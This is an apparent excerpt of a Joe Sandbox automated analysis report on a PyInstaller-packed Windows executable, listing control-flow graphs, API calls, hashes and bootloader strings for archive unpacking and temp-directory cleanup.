7ff6b7508cbf-7ff6b7508ccd WaitForSingleObject 40->49 46 7ff6b7508e11-7ff6b7508e35 GetExitCodeProcess CloseHandle * 2 41->46 47 7ff6b7508e04-7ff6b7508e0a DestroyWindow 41->47 50 7ff6b7508d00-7ff6b7508d38 MsgWaitForMultipleObjects PeekMessageW 42->50 52 7ff6b7508ddb-7ff6b7508de9 TranslateMessage DispatchMessageW 43->52 53 7ff6b7508def-7ff6b7508df6 43->53 44->36 51 7ff6b7508c24-7ff6b7508c41 PeekMessageW 44->51 45->44 46->31 47->46 48->49 49->41 54 7ff6b7508d3a 50->54 55 7ff6b7508d73-7ff6b7508d7a 50->55 56 7ff6b7508c76-7ff6b7508c86 WaitForSingleObject 51->56 57 7ff6b7508c43-7ff6b7508c74 TranslateMessage DispatchMessageW PeekMessageW 51->57 52->53 53->41 53->43 58 7ff6b7508d40-7ff6b7508d71 TranslateMessage DispatchMessageW PeekMessageW 54->58 55->43 59 7ff6b7508d7c-7ff6b7508da5 QueryPerformanceCounter 55->59 56->34 56->39 57->56 57->57 58->55 58->58 59->50 60 7ff6b7508dab-7ff6b7508db2 59->60 60->41 61 7ff6b7508db4-7ff6b7508db8 60->61 61->43
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Message$ErrorLast$ObjectProcessSingleWait$CloseCreateHandlePeekWindow_invalid_parameter_noinfo$ByteCharClassCodeCommandConsoleCtrlCurrentDestroyDispatchExitFormatHandlerInfoLineMultiRegisterStartupTerminateTranslateWide
                                                                                                                                                                                                                                              • String ID: CreateProcessW$Failed to create child process!$PyInstaller Onefile Hidden Window$PyInstallerOnefileHiddenWindow
                                                                                                                                                                                                                                              • API String ID: 3832162212-3165540532
                                                                                                                                                                                                                                              • Opcode ID: 99838be411f58a84d89697932930ae4644c798f1dd42cd928399edbb9bf0e48e
                                                                                                                                                                                                                                              • Instruction ID: 0f916afd0678db3eecd8a898f3a7dbc4401063a93fe515aea3663798724dcb29
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 99838be411f58a84d89697932930ae4644c798f1dd42cd928399edbb9bf0e48e
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1AD15E33A0CB8686EB109F78E8546A93771FF94B58F400239DB9E96AB4DF3CE5458740
                                                                                                                                                                                                                                              Function 00007FF6B7501000 Relevance: 61.8, APIs: 7, Strings: 28, Instructions: 511COMMON
                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 62 7ff6b7501000-7ff6b7503806 call 7ff6b750fe18 call 7ff6b750fe20 call 7ff6b750c850 call 7ff6b75153f0 call 7ff6b7515484 call 7ff6b75036b0 76 7ff6b7503814-7ff6b7503836 call 7ff6b7501950 62->76 77 7ff6b7503808-7ff6b750380f 62->77 82 7ff6b750383c-7ff6b7503856 call 7ff6b7501c80 76->82 83 7ff6b750391b-7ff6b7503931 call 7ff6b75045c0 76->83 78 7ff6b7503c97-7ff6b7503cb2 call 7ff6b750c550 77->78 87 7ff6b750385b-7ff6b750389b call 7ff6b7508830 82->87 90 7ff6b7503933-7ff6b7503960 call 7ff6b7507f90 83->90 91 7ff6b750396a-7ff6b750397f call 7ff6b7502710 83->91 96 7ff6b75038c1-7ff6b75038cc call 7ff6b7514f30 87->96 97 7ff6b750389d-7ff6b75038a3 87->97 99 7ff6b7503984-7ff6b75039a6 call 7ff6b7501c80 90->99 100 7ff6b7503962-7ff6b7503965 call 7ff6b751004c 90->100 101 7ff6b7503c8f 91->101 109 7ff6b75038d2-7ff6b75038e1 call 7ff6b7508830 96->109 110 7ff6b75039fc-7ff6b7503a2a call 7ff6b7508940 call 7ff6b75089a0 * 3 96->110 102 7ff6b75038a5-7ff6b75038ad 97->102 103 7ff6b75038af-7ff6b75038bd call 7ff6b75089a0 97->103 115 7ff6b75039b0-7ff6b75039b9 99->115 100->91 101->78 102->103 103->96 119 7ff6b75039f4-7ff6b75039f7 call 7ff6b7514f30 109->119 120 7ff6b75038e7-7ff6b75038ed 109->120 138 7ff6b7503a2f-7ff6b7503a3e call 7ff6b7508830 110->138 115->115 118 7ff6b75039bb-7ff6b75039d8 call 7ff6b7501950 115->118 118->87 130 7ff6b75039de-7ff6b75039ef call 7ff6b7502710 118->130 119->110 124 7ff6b75038f0-7ff6b75038fc 120->124 127 7ff6b7503905-7ff6b7503908 124->127 128 7ff6b75038fe-7ff6b7503903 124->128 127->119 131 7ff6b750390e-7ff6b7503916 call 7ff6b7514f30 127->131 128->124 128->127 130->101 131->138 141 7ff6b7503b45-7ff6b7503b53 138->141 142 7ff6b7503a44-7ff6b7503a47 138->142 143 7ff6b7503b59-7ff6b7503b5d 141->143 144 7ff6b7503a67 141->144 142->141 145 7ff6b7503a4d-7ff6b7503a50 142->145 146 7ff6b7503a6b-7ff6b7503a90 call 7ff6b7514f30 143->146 144->146 147 7ff6b7503b14-7ff6b7503b17 145->147 148 7ff6b7503a56-7ff6b7503a5a 145->148 157 7ff6b7503a92-7ff6b7503aa6 call 7ff6b7508940 146->157 158 7ff6b7503aab-7ff6b7503ac0 146->158 149 7ff6b7503b2f-7ff6b7503b40 call 7ff6b7502710 147->149 150 7ff6b7503b19-7ff6b7503b1d 147->150 148->147 152 7ff6b7503a60 148->152 159 7ff6b7503c7f-7ff6b7503c87 149->159 150->149 153 7ff6b7503b1f-7ff6b7503b2a 150->153 152->144 153->146 157->158 161 7ff6b7503be8-7ff6b7503bfa call 7ff6b7508830 158->161 162 7ff6b7503ac6-7ff6b7503aca 158->162 159->101 170 7ff6b7503c2e 161->170 171 7ff6b7503bfc-7ff6b7503c02 161->171 164 7ff6b7503ad0-7ff6b7503ae8 call 7ff6b7515250 162->164 165 7ff6b7503bcd-7ff6b7503be2 call 7ff6b7501940 162->165 175 7ff6b7503b62-7ff6b7503b7a call 7ff6b7515250 164->175 176 7ff6b7503aea-7ff6b7503b02 call 7ff6b7515250 164->176 165->161 165->162 177 7ff6b7503c31-7ff6b7503c40 call 7ff6b7514f30 170->177 173 7ff6b7503c04-7ff6b7503c1c 171->173 174 7ff6b7503c1e-7ff6b7503c2c 171->174 173->177 174->177 186 7ff6b7503b7c-7ff6b7503b80 175->186 187 7ff6b7503b87-7ff6b7503b9f call 7ff6b7515250 175->187 176->165 188 7ff6b7503b08-7ff6b7503b0f 176->188 184 7ff6b7503d41-7ff6b7503d63 call 7ff6b75044e0 177->184 185 7ff6b7503c46-7ff6b7503c4a 177->185 199 7ff6b7503d65-7ff6b7503d6f call 7ff6b7504630 184->199 200 7ff6b7503d71-7ff6b7503d82 call 7ff6b7501c80 184->200 189 7ff6b7503cd4-7ff6b7503ce6 call 7ff6b7508830 185->189 190 7ff6b7503c50-7ff6b7503c5f call 7ff6b75090e0 185->190 186->187 201 7ff6b7503ba1-7ff6b7503ba5 187->201 202 7ff6b7503bac-7ff6b7503bc4 call 7ff6b7515250 187->202 188->165 206 7ff6b7503d35-7ff6b7503d3c 189->206 207 7ff6b7503ce8-7ff6b7503ceb 189->207 204 7ff6b7503cb3-7ff6b7503cb6 call 7ff6b7508660 190->204 205 7ff6b7503c61 190->205 214 7ff6b7503d87-7ff6b7503d96 199->214 200->214 201->202 202->165 216 7ff6b7503bc6 202->216 221 7ff6b7503cbb-7ff6b7503cbd 204->221 211 7ff6b7503c68 call 7ff6b7502710 205->211 206->211 207->206 212 7ff6b7503ced-7ff6b7503d10 call 7ff6b7501c80 207->212 224 7ff6b7503c6d-7ff6b7503c77 211->224 229 7ff6b7503d12-7ff6b7503d26 call 7ff6b7502710 call 7ff6b7514f30 212->229 230 7ff6b7503d2b-7ff6b7503d33 call 7ff6b7514f30 212->230 219 7ff6b7503dc4-7ff6b7503dda call 7ff6b7509390 214->219 220 7ff6b7503d98-7ff6b7503d9f 214->220 216->165 232 7ff6b7503ddc 219->232 233 7ff6b7503de8-7ff6b7503e04 SetDllDirectoryW 219->233 220->219 226 7ff6b7503da1-7ff6b7503da5 220->226 222 7ff6b7503cbf-7ff6b7503cc6 221->222 223 7ff6b7503cc8-7ff6b7503ccf 221->223 222->211 223->214 224->159 226->219 231 7ff6b7503da7-7ff6b7503dbe SetDllDirectoryW LoadLibraryExW 226->231 229->224 230->214 231->219 232->233 237 7ff6b7503f01-7ff6b7503f08 233->237 238 7ff6b7503e0a-7ff6b7503e19 call 7ff6b7508830 233->238 242 7ff6b7503f0e-7ff6b7503f15 237->242 243 7ff6b7504008-7ff6b7504010 237->243 251 7ff6b7503e32-7ff6b7503e3c call 7ff6b7514f30 238->251 252 7ff6b7503e1b-7ff6b7503e21 238->252 242->243 244 7ff6b7503f1b-7ff6b7503f25 call 7ff6b75033c0 242->244 245 7ff6b7504035-7ff6b7504067 call 7ff6b75036a0 call 7ff6b7503360 call 7ff6b7503670 call 7ff6b7506fc0 call 7ff6b7506d70 243->245 246 7ff6b7504012-7ff6b750402f PostMessageW GetMessageW 243->246 244->224 258 7ff6b7503f2b-7ff6b7503f3f call 7ff6b75090c0 244->258 246->245 263 7ff6b7503ef2-7ff6b7503efc call 7ff6b7508940 251->263 264 7ff6b7503e42-7ff6b7503e48 251->264 255 7ff6b7503e23-7ff6b7503e2b 252->255 256 7ff6b7503e2d-7ff6b7503e2f 252->256 255->256 256->251 269 7ff6b7503f64-7ff6b7503fa0 call 7ff6b7508940 call 7ff6b75089e0 call 7ff6b7506fc0 call 7ff6b7506d70 call 7ff6b75088e0 258->269 270 7ff6b7503f41-7ff6b7503f5e PostMessageW GetMessageW 258->270 263->237 264->263 268 7ff6b7503e4e-7ff6b7503e54 264->268 272 7ff6b7503e5f-7ff6b7503e61 268->272 273 7ff6b7503e56-7ff6b7503e58 268->273 306 7ff6b7503fa5-7ff6b7503fa7 269->306 270->269 272->237 275 7ff6b7503e67-7ff6b7503e83 call 7ff6b7506dc0 call 7ff6b7507340 272->275 274 7ff6b7503e5a 273->274 273->275 274->237 289 7ff6b7503e85-7ff6b7503e8c 275->289 290 7ff6b7503e8e-7ff6b7503e95 275->290 292 7ff6b7503edb-7ff6b7503ef0 call 7ff6b7502a50 call 7ff6b7506fc0 call 7ff6b7506d70 289->292 293 7ff6b7503eaf-7ff6b7503eb9 call 7ff6b75071b0 290->293 294 7ff6b7503e97-7ff6b7503ea4 call 7ff6b7506e00 290->294 292->237 304 7ff6b7503ec4-7ff6b7503ed2 call 7ff6b75074f0 293->304 305 7ff6b7503ebb-7ff6b7503ec2 293->305 294->293 308 7ff6b7503ea6-7ff6b7503ead 294->308 304->237 318 7ff6b7503ed4 304->318 305->292 310 7ff6b7503ff5-7ff6b7504003 call 7ff6b7501900 306->310 311 7ff6b7503fa9-7ff6b7503fbf call 7ff6b7508ed0 call 7ff6b75088e0 306->311 308->292 310->224 311->310 323 7ff6b7503fc1-7ff6b7503fd6 311->323 318->292 324 7ff6b7503ff0 call 7ff6b7502a50 323->324 325 7ff6b7503fd8-7ff6b7503feb call 7ff6b7502710 call 7ff6b7501900 323->325 324->310 325->224
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ErrorFileLastModuleName
                                                                                                                                                                                                                                              • String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to load splash screen resources!$Failed to remove temporary directory: %s$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s$MEI$PYINSTALLER_RESET_ENVIRONMENT$PYINSTALLER_STRICT_UNPACK_MODE$PYINSTALLER_SUPPRESS_SPLASH_SCREEN$Path exceeds PYI_PATH_MAX limit.$Py_GIL_DISABLED$VCRUNTIME140.dll$_PYI_APPLICATION_HOME_DIR$_PYI_APPLICATION_HOME_DIR not set for onefile child process!$_PYI_ARCHIVE_FILE$_PYI_PARENT_PROCESS_LEVEL$_PYI_SPLASH_IPC$bye-runtime-tmpdir$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-python-flag
                                                                                                                                                                                                                                              • API String ID: 2776309574-3273434969
                                                                                                                                                                                                                                              • Opcode ID: 56efb0c328102eab1d406dba677a265d22c75a80e3e063e6a6bdbd0eb2694019
                                                                                                                                                                                                                                              • Instruction ID: f3c13057bcb0795d7ae581c6e9239222db61db7870566825c6748627edfbdb5b
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 56efb0c328102eab1d406dba677a265d22c75a80e3e063e6a6bdbd0eb2694019
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BE327923A0CA8291FB299B2DD4553B927A1AF44788F84443ADB5DC32F6EF2CF559C344
                                                                                                                                                                                                                                              Function 00007FF6B7526964 Relevance: 13.8, APIs: 9, Instructions: 276fileCOMMON
                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 538 7ff6b7526964-7ff6b75269d7 call 7ff6b7526698 541 7ff6b75269d9-7ff6b75269e2 call 7ff6b7514ee8 538->541 542 7ff6b75269f1-7ff6b75269fb call 7ff6b7518520 538->542 547 7ff6b75269e5-7ff6b75269ec call 7ff6b7514f08 541->547 548 7ff6b7526a16-7ff6b7526a7f CreateFileW 542->548 549 7ff6b75269fd-7ff6b7526a14 call 7ff6b7514ee8 call 7ff6b7514f08 542->549 565 7ff6b7526d32-7ff6b7526d52 547->565 550 7ff6b7526afc-7ff6b7526b07 GetFileType 548->550 551 7ff6b7526a81-7ff6b7526a87 548->551 549->547 557 7ff6b7526b09-7ff6b7526b44 GetLastError call 7ff6b7514e7c CloseHandle 550->557 558 7ff6b7526b5a-7ff6b7526b61 550->558 554 7ff6b7526ac9-7ff6b7526af7 GetLastError call 7ff6b7514e7c 551->554 555 7ff6b7526a89-7ff6b7526a8d 551->555 554->547 555->554 563 7ff6b7526a8f-7ff6b7526ac7 CreateFileW 555->563 557->547 573 7ff6b7526b4a-7ff6b7526b55 call 7ff6b7514f08 557->573 561 7ff6b7526b69-7ff6b7526b6c 558->561 562 7ff6b7526b63-7ff6b7526b67 558->562 568 7ff6b7526b72-7ff6b7526bc7 call 7ff6b7518438 561->568 569 7ff6b7526b6e 561->569 562->568 563->550 563->554 576 7ff6b7526be6-7ff6b7526c17 call 7ff6b7526418 568->576 577 7ff6b7526bc9-7ff6b7526bd5 call 7ff6b75268a0 568->577 569->568 573->547 583 7ff6b7526c19-7ff6b7526c1b 576->583 584 7ff6b7526c1d-7ff6b7526c5f 576->584 577->576 585 7ff6b7526bd7 577->585 586 7ff6b7526bd9-7ff6b7526be1 call 7ff6b751aac0 583->586 587 7ff6b7526c81-7ff6b7526c8c 584->587 588 7ff6b7526c61-7ff6b7526c65 584->588 585->586 586->565 590 7ff6b7526d30 587->590 591 7ff6b7526c92-7ff6b7526c96 587->591 588->587 589 7ff6b7526c67-7ff6b7526c7c 588->589 589->587 590->565 591->590 593 7ff6b7526c9c-7ff6b7526ce1 CloseHandle CreateFileW 591->593 595 7ff6b7526d16-7ff6b7526d2b 593->595 596 7ff6b7526ce3-7ff6b7526d11 GetLastError call 7ff6b7514e7c call 7ff6b7518660 593->596 595->590 596->595
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1617910340-0
                                                                                                                                                                                                                                              • Opcode ID: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
                                                                                                                                                                                                                                              • Instruction ID: cf893e351dc205a47d7644c89b0848d5f0e7030fc3451c5f0b844973060f5006
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 68C1AE37B28A4685EB10CFA9C4906AC3761FB49BA8F115239DF5E97BA4DF38E451C340
                                                                                                                                                                                                                                              Function 00007FF6B75083C0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89fileCOMMON
                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • FindFirstFileW.KERNELBASE(?,00007FF6B7508919,00007FF6B7503FA5), ref: 00007FF6B750842B
                                                                                                                                                                                                                                              • RemoveDirectoryW.KERNEL32(?,00007FF6B7508919,00007FF6B7503FA5), ref: 00007FF6B75084AE
                                                                                                                                                                                                                                              • DeleteFileW.KERNELBASE(?,00007FF6B7508919,00007FF6B7503FA5), ref: 00007FF6B75084CD
                                                                                                                                                                                                                                              • FindNextFileW.KERNELBASE(?,00007FF6B7508919,00007FF6B7503FA5), ref: 00007FF6B75084DB
                                                                                                                                                                                                                                              • FindClose.KERNEL32(?,00007FF6B7508919,00007FF6B7503FA5), ref: 00007FF6B75084EC
                                                                                                                                                                                                                                              • RemoveDirectoryW.KERNELBASE(?,00007FF6B7508919,00007FF6B7503FA5), ref: 00007FF6B75084F5
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
                                                                                                                                                                                                                                              • String ID: %s\*
                                                                                                                                                                                                                                              • API String ID: 1057558799-766152087
                                                                                                                                                                                                                                              • Opcode ID: 9215641a051a597ab69d89bbe09b444c24fb25eba6eed844fe9e008ab190e420
                                                                                                                                                                                                                                              • Instruction ID: 357850099f2e1e2cd68665016846c1d9ce0cd1ccdab5cdcc1ad199b6742cb407
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9215641a051a597ab69d89bbe09b444c24fb25eba6eed844fe9e008ab190e420
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D1416023E0CA8695EA209F28E4445FA63A0FB9475CF500236EB9DD36E4EF3CE549C741
                                                                                                                                                                                                                                              Function 00007FF6B7509280 Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2295610775-0
                                                                                                                                                                                                                                              • Opcode ID: 3849ca1beccae91a12aeced599bc73bdbec409d6dd090ca7d2ec6d5d284a4285
                                                                                                                                                                                                                                              • Instruction ID: e73f47549c7a00f71c569e5c0274794dc2986bf4d1ef8f373acee72fd589298e
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3849ca1beccae91a12aeced599bc73bdbec409d6dd090ca7d2ec6d5d284a4285
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0CF06823A1C74286F7608F68B4997667390AB84768F050339DBAD426E4DF3CD059CB04
                                                                                                                                                                                                                                              Function 00007FF6B7501950 Relevance: 22.9, APIs: 2, Strings: 11, Instructions: 184COMMON
                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 331 7ff6b7501950-7ff6b750198b call 7ff6b75045c0 334 7ff6b7501991-7ff6b75019d1 call 7ff6b7507f90 331->334 335 7ff6b7501c4e-7ff6b7501c72 call 7ff6b750c550 331->335 340 7ff6b7501c3b-7ff6b7501c3e call 7ff6b751004c 334->340 341 7ff6b75019d7-7ff6b75019e7 call 7ff6b75106d4 334->341 345 7ff6b7501c43-7ff6b7501c4b 340->345 346 7ff6b75019e9-7ff6b7501a03 call 7ff6b7514f08 call 7ff6b7502910 341->346 347 7ff6b7501a08-7ff6b7501a24 call 7ff6b751039c 341->347 345->335 346->340 353 7ff6b7501a45-7ff6b7501a5a call 7ff6b7514f28 347->353 354 7ff6b7501a26-7ff6b7501a40 call 7ff6b7514f08 call 7ff6b7502910 347->354 361 7ff6b7501a5c-7ff6b7501a76 call 7ff6b7514f08 call 7ff6b7502910 353->361 362 7ff6b7501a7b-7ff6b7501afc call 7ff6b7501c80 * 2 call 7ff6b75106d4 353->362 354->340 361->340 373 7ff6b7501b01-7ff6b7501b14 call 7ff6b7514f44 362->373 376 7ff6b7501b35-7ff6b7501b4e call 7ff6b751039c 373->376 377 7ff6b7501b16-7ff6b7501b30 call 7ff6b7514f08 call 7ff6b7502910 373->377 382 7ff6b7501b50-7ff6b7501b6a call 7ff6b7514f08 call 7ff6b7502910 376->382 383 7ff6b7501b6f-7ff6b7501b8b call 7ff6b7510110 376->383 377->340 382->340 391 7ff6b7501b9e-7ff6b7501bac 383->391 392 7ff6b7501b8d-7ff6b7501b99 call 7ff6b7502710 383->392 391->340 393 7ff6b7501bb2-7ff6b7501bb9 391->393 392->340 396 7ff6b7501bc1-7ff6b7501bc7 393->396 398 7ff6b7501be0-7ff6b7501bef 396->398 399 7ff6b7501bc9-7ff6b7501bd6 396->399 398->398 400 7ff6b7501bf1-7ff6b7501bfa 398->400 399->400 401 7ff6b7501c0f 400->401 402 7ff6b7501bfc-7ff6b7501bff 400->402 404 7ff6b7501c11-7ff6b7501c24 401->404 402->401 403 7ff6b7501c01-7ff6b7501c04 402->403 403->401 405 7ff6b7501c06-7ff6b7501c09 403->405 406 7ff6b7501c2d-7ff6b7501c39 404->406 407 7ff6b7501c26 404->407 405->401 408 7ff6b7501c0b-7ff6b7501c0d 405->408 406->340 406->396 407->406 408->404
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00007FF6B7507F90: _fread_nolock.LIBCMT ref: 00007FF6B750803A
                                                                                                                                                                                                                                              • _fread_nolock.LIBCMT ref: 00007FF6B7501A1B
                                                                                                                                                                                                                                                • Part of subcall function 00007FF6B7502910: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF6B7501B6A), ref: 00007FF6B750295E
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _fread_nolock$CurrentProcess
                                                                                                                                                                                                                                              • String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
                                                                                                                                                                                                                                              • API String ID: 2397952137-3497178890
                                                                                                                                                                                                                                              • Opcode ID: e8397b0d0ea8626c6fc67993dd962eb2185773315f76238df3ab4be19089fc6a
                                                                                                                                                                                                                                              • Instruction ID: 5c34680bb581b6037308d45a95421ba431b8b308b1ce436240f7b5630e3438f5
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e8397b0d0ea8626c6fc67993dd962eb2185773315f76238df3ab4be19089fc6a
